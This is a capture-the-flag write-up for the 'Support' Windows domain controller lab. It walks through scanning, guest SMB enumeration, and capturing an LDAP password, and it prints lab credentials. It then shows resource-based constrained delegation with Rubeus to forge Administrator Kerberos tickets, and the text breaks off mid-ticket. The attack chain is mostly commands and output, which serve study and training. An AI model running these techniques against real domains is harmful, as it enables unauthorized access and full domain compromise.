Support

Nmap Scan

$ nmap -sC -sV -Pn -oN nmap 10.10.11.174
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-23 10:25 +08
Nmap scan report for 10.10.11.174
Host is up (0.0061s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-23 02:20:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5m34s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-05-23T02:20:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.64 seconds

Initial Access

Guest Access to SMB Server

We can see that there is a share that the guestaccount can access.

$ enum4linux -a -u 'guest' -p '' 10.10.11.174
...
 =================================( Share Enumeration on 10.10.11.174 )=================================
                                                                                                                                                                                                                  
do_connect: Connection to 10.10.11.174 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                                                                           

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.11.174                                                                                                                                                                      
                                                                                                                                                                                                                  
//10.10.11.174/ADMIN$   Mapping: DENIED Listing: N/A Writing: N/A                                                                                                                                                 
//10.10.11.174/C$       Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:                                                                                                                                                                                    
                                                                                                                                                                                                                  
NT_STATUS_NO_SUCH_FILE listing \*                                                                                                                                                                                 
//10.10.11.174/IPC$     Mapping: N/A Listing: N/A Writing: N/A
//10.10.11.174/NETLOGON Mapping: OK Listing: DENIED Writing: N/A
//10.10.11.174/support-tools    Mapping: OK Listing: OK Writing: N/A
//10.10.11.174/SYSVOL   Mapping: OK Listing: DENIED Writing: N/A

After entering the share folder, we can see there are these files.

$ smbclient //10.10.11.174/support-tools -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jul 21 01:01:06 2022
  ..                                  D        0  Sat May 28 19:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 19:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 19:19:55 2022
  putty.exe                           A  1273576  Sat May 28 19:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 19:19:31 2022
  UserInfo.exe.zip                    A   277499  Thu Jul 21 01:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 19:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 19:19:43 2022

                4026367 blocks of size 4096. 953565 blocks available
smb: \>

We will then download all the files to our local machine.

smb: \> get 7-ZipPortable_21.07.paf.exe 
getting file \7-ZipPortable_21.07.paf.exe of size 2880728 as 7-ZipPortable_21.07.paf.exe (9254.0 KiloBytes/sec) (average 9254.0 KiloBytes/sec)
smb: \> get npp.8.4.1.portable.x64.zip 
getting file \npp.8.4.1.portable.x64.zip of size 5439245 as npp.8.4.1.portable.x64.zip (12072.2 KiloBytes/sec) (average 10920.7 KiloBytes/sec)
smb: \> get putty.exe 
getting file \putty.exe of size 1273576 as putty.exe (9422.2 KiloBytes/sec) (average 10694.9 KiloBytes/sec)
smb: \> get SysinternalsSuite.zip 
getting file \SysinternalsSuite.zip of size 48102161 as SysinternalsSuite.zip (19196.9 KiloBytes/sec) (average 16955.6 KiloBytes/sec)
smb: \> get UserInfo.exe.zip 
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (5530.5 KiloBytes/sec) (average 16789.6 KiloBytes/sec)
smb: \> get windirstat1_1_2_setup.exe 
getting file \windirstat1_1_2_setup.exe of size 79171 as windirstat1_1_2_setup.exe (2863.5 KiloBytes/sec) (average 16679.0 KiloBytes/sec)
smb: \> get WiresharkPortable64_3.6.5.paf.exe 
getting file \WiresharkPortable64_3.6.5.paf.exe of size 44398000 as WiresharkPortable64_3.6.5.paf.exe (19752.8 KiloBytes/sec) (average 17885.1 KiloBytes/sec)
smb: \>

After enumerating, we realised that there is 1 binary that is not publicly available which is UserInfo.exe.zip. After unzipping, we can see that UserInfo.exe is a binary which is using .NET Framework.

$ strings UserInfo.exe                
!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
,Er
,ZsE
BSJB
v4.0.30319
#Strings
#GUID
#Blob
<Main>d__0
<>u__1
Task`1
CommandLineParser`1
TaskAwaiter`1
IParserResult`1
Int32
<OnExecuteAsync>d__2
Command`2
Int64
<Module>
<Main>
get_ASCII
mscorlib
ParseAsync
OnExecuteAsync
get_PropertiesToLoad
Protected
AwaitUnsafeOnCompleted
get_IsCompleted
System.Collections.Specialized
<UserName>k__BackingField
<LastName>k__BackingField
<FirstName>k__BackingField
<Verbose>k__BackingField
MatthiWare.CommandLine.Abstractions.Command
getPassword
enc_password
get_Message
IDisposable
Console
set_AppName
get_UserName
set_UserName
get_LastName
set_LastName
get_FirstName
set_FirstName
username
FromFileTime
DateTime
FindOne
MatthiWare.CommandLine
WriteLine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
set_AuthenticationType
OnConfigure
ReadOnlyCollectionBase
get_Verbose
set_Verbose
verbose
Dispose
Create
<>1__state
Write
RequiredAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
NameAttribute
AsyncStateMachineAttribute
DefaultValueAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
value
UserInfo.exe
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
MatthiWare.CommandLine.Abstractions.Parsing
get_Task
FindAll
Program
get_Item
System
CancellationToken
cancellationToken
Main
System.Reflection
ResultPropertyValueCollection
StringCollection
SearchResultCollection
ResultPropertyCollection
SetException
Description
UserInfo
AsyncTaskMethodBuilder
ICommandConfigurationBuilder
<>t__builder
DirectorySearcher
FindUser
GetUser
printUser
CommandLineParser
TaskAwaiter
GetAwaiter
set_Filter
IEnumerator
GetEnumerator
.ctor
.cctor
System.Diagnostics
UserInfo.Commands
DiscoverCommands
UserInfo.Services
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.DirectoryServices
DebuggingModes
get_Properties
AuthenticationTypes
MatthiWare.CommandLine.Core.Attributes
GetBytes
args
System.Threading.Tasks
Contains
System.Collections
commandOptions
GlobalOptions
FindUserOptions
GetUserOptions
CommandLineParserOptions
options
get_HasErrors
Concat
Object
get_Default
SearchResult
GetResult
SetResult
get_Current
get_Count
Start
Convert
last
first
MoveNext
System.Text
GetExecutingAssembly
LdapQuery
query
DirectoryEntry
entry
WrapNonExceptionThrows
UserInfo
Copyright 
  2022
$5a280d0b-9fd0-4701-8f96-82e2f1ea9dfb
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8 
UserInfo.Program+<Main>d__0
/UserInfo.Commands.FindUser+<OnExecuteAsync>d__2
.UserInfo.Commands.GetUser+<OnExecuteAsync>d__2
username
Username
first
First name
last
        Last name
verbose
Verbose output
RSDS
C:\Users\0xdf\source\repos\UserInfo\obj\Release\UserInfo.pdb
_CorExeMain
mscoree.dll

So, we can try to decompile the executable. However, I am bad at doing RE stuff so I resorted to running the executable on kali and capturing the authentication process.

What's better than ILDasm? ILSpy and dnSpy are tools to Decompile .NET Codeshanselman

Capturing LDAP Simple Authentication Credentials

So we will run wireshark first, then we run the command.

We should be able to see the password.

From there we can use ldapsearch to enumerate more information about the domain:

$ ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"

However, this will give us too much information. But we can filter using grep .

$ ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | grep sAMAccountName
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: Administrators
sAMAccountName: Users
sAMAccountName: Guests
sAMAccountName: Print Operators
sAMAccountName: Backup Operators
sAMAccountName: Replicator
sAMAccountName: Remote Desktop Users
sAMAccountName: Network Configuration Operators
sAMAccountName: Performance Monitor Users
sAMAccountName: Performance Log Users
sAMAccountName: Distributed COM Users
sAMAccountName: IIS_IUSRS
sAMAccountName: Cryptographic Operators
sAMAccountName: Event Log Readers
sAMAccountName: Certificate Service DCOM Access
sAMAccountName: RDS Remote Access Servers
sAMAccountName: RDS Endpoint Servers
sAMAccountName: RDS Management Servers
sAMAccountName: Hyper-V Administrators
sAMAccountName: Access Control Assistance Operators
sAMAccountName: Remote Management Users
sAMAccountName: Storage Replica Administrators
sAMAccountName: DC$
sAMAccountName: krbtgt
sAMAccountName: Domain Computers
sAMAccountName: Domain Controllers
sAMAccountName: Schema Admins
sAMAccountName: Enterprise Admins
sAMAccountName: Cert Publishers
sAMAccountName: Domain Admins
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Server Operators
sAMAccountName: Account Operators
sAMAccountName: Pre-Windows 2000 Compatible Access
sAMAccountName: Incoming Forest Trust Builders
sAMAccountName: Windows Authorization Access Group
sAMAccountName: Terminal Server License Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Read-only Domain Controllers
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: Cloneable Domain Controllers
sAMAccountName: Protected Users
sAMAccountName: Key Admins
sAMAccountName: Enterprise Key Admins
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: Shared Support Accounts
sAMAccountName: ldap
sAMAccountName: support
sAMAccountName: smith.rosario
sAMAccountName: hernandez.stanley
sAMAccountName: wilson.shelby
sAMAccountName: anderson.damian
sAMAccountName: thomas.raphael
sAMAccountName: levine.leopoldo
sAMAccountName: raven.clifton
sAMAccountName: bardot.mary
sAMAccountName: cromwell.gerard
sAMAccountName: monroe.david
sAMAccountName: west.laura
sAMAccountName: langley.lucy
sAMAccountName: daughtler.mabel
sAMAccountName: stoll.rachelle
sAMAccountName: ford.victoria
sAMAccountName: MANAGEMENT$
sAMAccountName: SERVICEA$

From there we can compile all the users to a single list:

ldap
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria

Next we can try to do AS-REP Roasting to see if there is any account that is vulnerable.

Credential hidden in LDAP field

However, there are no accounts that are AS-REP Roastable, so we will continue to enumerate from ldap search. There is a field that is very suspicious as the other accounts do not have this field except support. They have this field info which looks like a password

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20240522095648.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 90181
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 1
codePage: 0
countryCode: 0
badPasswordTime: 133608365496907636
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133608454089095238

After trying that as the password, it turns out to be correct.

Since the user is also in Remote Management User Group, we can use evil-winrm to get a shell.

Privilege Escalation

https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.htmlbloodhound.readthedocs.io

Abusing GenericAll

Resource-based Constrained Delegation - HackTricksbook.hacktricks.xyz

We will use both Powermad and PowerView to abuse this.

FIrstly, Import both PowerView.ps1 and Powermad.ps1. Then follow the following screenshots.

Then we can use Rebeus to generate the ticket for us.

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123
[*] Input username             : FAKE-COMP01$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake-comp01.support.htb
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : 06C1EABAD3A21C24DF384247BC85C540
[*]       aes256_cts_hmac_sha1 : FF7BA224B544AA97002B2BEE94EADBA7855EF81A1E05B7EB33D4BCD55807FF53
[*]       des_cbc_md5          : 5B045E854358687C

*Evil-WinRM* PS C:\Users\support\Documents> .\rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.1.2

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP01$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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


[*] Action: S4U

[*] Building S4U2self request for: 'FAKE-COMP01$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP01$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

      doIFrDCCBaigAwIBBaEDAgEWooIExjCCBMJhggS+MIIEuqADAgEFoQ0bC1NVUFBPUlQuSFRCohkwF6AD
      AgEBoRAwDhsMRkFLRS1DT01QMDEko4IEhzCCBIOgAwIBF6EDAgEBooIEdQSCBHHWlb3pWFCYmLeZ0SWB
      s+bsgb4bCJQoH041+9/A1kONSz070d01ZDJ5aF7ofS1N6xbelsW3GSH0qNlhgEvJAEkULzZA4qs4Qoo5
      gr/8eQVbUnj2yH/fy6QNKR/S5fbj4SAuoAQWqsJO+AzBNRFVttBt0kXGgoc5Q5lBH7j0dAUfzxWs3ICG
      2FB0aMkB1xdSxdG8fgYD7GgHloHaCRtSNpGBj7d03vDY8OavPGgv+iVt/JyDxDlKaWUmqPzUu9/9y9jX
      M0+szCZ1bB0AIMwhmXJLmhdhEuCNHOAFpe3KarHbhxbZvjcwoYi6+hdqKhmzRISwOPiuzzyUWwbnEptg
      HcHpRHHlAX6YMSpQFyTwQbRlZBgR3Uu7JmMYgHdk1XX3bIInn5gla04X9kTDYMYDM/8vqprw8sEE5w96
      fzxx7TSR9dc73SIs4h0J6tAbViq3wDUL4k8FkC4szm+hBmaAeYhFOVRIKy7LANyJ/lba26KVc2DKmT/w
      BRhiV2uzjoJMH7OKncDMZcR3NrbhLXrsi4AyjteKmnvZja5HWo7j6MlWSTFbKf+3pEuFmu1HvhJEiqR1
      m2pXY7NEiG1XLTal19/CvudLVQo5aVun3RHuKPTCoGYdeTgRdiTSA1IcjRSNvNUQMzO+hCcQX0q6Nrqq
      gMy+/MnyFJZsK/MtUWe+kD4FGW59ZoBIjJQWSR77RwWYBNSNFVvW6pOx9+UQV9NkPlUD8r0tHKrLSQsf
      e8i/m0hhh2rCNNQICD+vEV2CJKPeLyPb9DKkH+Gz4paHpv9Xj8uzSWpNMz/WSxFrz6NkwmX5YkVM218H
      KwEru8ZwWIswjt/8h7ylf3Qg6QBZAnMxCtNeqYWno36KSRon67CKj7aodPiq796r2qxX7/v3NHstzu+R
      zynGHtoyTKQQ/HkDnu6DB9uZGPSApTTMkHp+aOG7wZqpi986XSwUyQWBMeuDQ5QJS3GnRrps2B9ihen4
      HRh8te413TRNn5O4mimjgw+kWVZbDbAwJl6eQjepnaPS7ZylQGQukpNs0worC/D91JXeXpzPW6kRJZ7O
      55jYOknMRT2II4rOfqF7Qa5RQ4I1lwxCBJWuoUwXzbmqniZmIcNgvk7MY8jSY7FVcXg8AcPQMsOYZEKr
      KNwwj/huDOSs90laCu3ksMgzR2dQ9OkllrgAzJeMBoszBNa0eN/7rK1cAgE8wORS00f0YHQrmttw+aU1
      914mnUa2DznowMflI7iHkEgWXDBTEfdps4UEp8C11DgXCZvhpuzFq1U06kkDuOcEPMF3QvWxNaGg8skA
      zX6khqjRuBANLvM7DMvhBUJ5poBH0+204+2B8/dUJp5qtuqf7K+iiJASmm9r5gl9sb5/FmCFZZ61dmXq
      849yC20DNoI6t+eWEcVIJrnSfD3avTiLoWArFd6h/tFJWcNd5cfPx1WUJoLA4uQlEIV4kan2eGTv8rTD
      D5d/21b/eLYVMxUCpro5uz17LgKdabGiHkGH6WFYsVTse35c+vfUIax6ZRijgdEwgc6gAwIBAKKBxgSB
      w32BwDCBvaCBujCBtzCBtKAbMBmgAwIBF6ESBBAKw9XkJkKBIgw7w+d/nviXoQ0bC1NVUFBPUlQuSFRC
      ohowGKADAgEKoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKEAAKURGA8yMDI0MDUyMzA4MTc1M1qmERgP
      MjAyNDA1MjMxODE3NTNapxEYDzIwMjQwNTMwMDgxNzUzWqgNGwtTVVBQT1JULkhUQqkZMBegAwIBAaEQ
      MA4bDEZBS0UtQ09NUDAxJA==

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      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
      MBYbBGNpZnMbDmRjLnN1cHBvcnQuaHRi
[+] Ticket successfully imported!

After that we will take the content of the last ticket after removing all the newlines and whitespaces

Remove All Whitespace - Delete Spaces, Tabs, Newlines - Online - Browserling Web Developer Toolswww.browserling.com

doIGaDCCBmSgAwIBBaEDAgEWooIFejCCBXZhggVyMIIFbqADAgEFoQ0bC1NVUFBPUlQuSFRCoiEwH6ADAgECoRgwFhsEY2lmcxsOZGMuc3VwcG9ydC5odGKjggUzMIIFL6ADAgESoQMCAQaiggUhBIIFHeg9Li2AeqVW+4WsYniZ3+oT0umOilcDcNeDD3nKlFBIeDq/MyV/HqIMZbJbgNdvQk5Qr5jwj362dTwy+mt3UpbUHXZZL8F6xku17I3ktgXUg3n6DjlIPZGLPxeVwtfz2uMHTPwKQkjkYsDITOhmPYYk+9QKeKL9KrY3F847N6qsz3V+fUFVWHHvDY3nu8zcv4C0+i6zO1o5VlMNVdaP+8jsZlbt95APtufpvovtl/Zn7seTs/JRq0nRVfUTDRdYfpV4YekXxQJnwJ/qz3GSyyMfaGP3qvkmmvqCfZWSPEydp0/uF7apA/oz7M1vjXt6sNZNGGXkYrHjQqX94VGZQfp3XKu7CoF1B8RpvFL8fodufc72jvvWkQnw/Ld5R/5SAvelkqens9sTSzkBFrJgD5TjkHTboGTAYORqHmhwpFiO4pJxc8Qptzp9p5Eoxd7uu9sF56SNOtcOOHG0kB2mzfghS1dGxzKrzMIu359XSS5Ma+J4/gxLSlcfXEj5daLm5lMjc5FxHnXhRiUGA+qAUocYO7iFUZmob0hDUvEmKFXvPgXm5nSwd3LJVpLMCJT+r0eO+SX8UuVq1B5g3KvrjZRysuJZ1Ph1yWbH5szGNYQ2R8CAE+EmpMNHejdhQUxEkDuvdNb0+N2PDu+CbJtwiqn5pfcxrfwExr/IBNIneGK1LQ8uPYLOIWeZ1YmkgPbLFG3LdHOENaCD4FeQ28tDrAIuhoiPsqDVs72NsADjHPd1F51iOjk43K2142OHd7JwpHnMLTnNgKQhFDPxW3bnuEC85TfM2vbt2ow/0VmrbwoBYIo0gRRo5x+KiHdOLLofj65xPOSd4dT841ziFsyV6GZAo53cDog/RQlzQj/Zs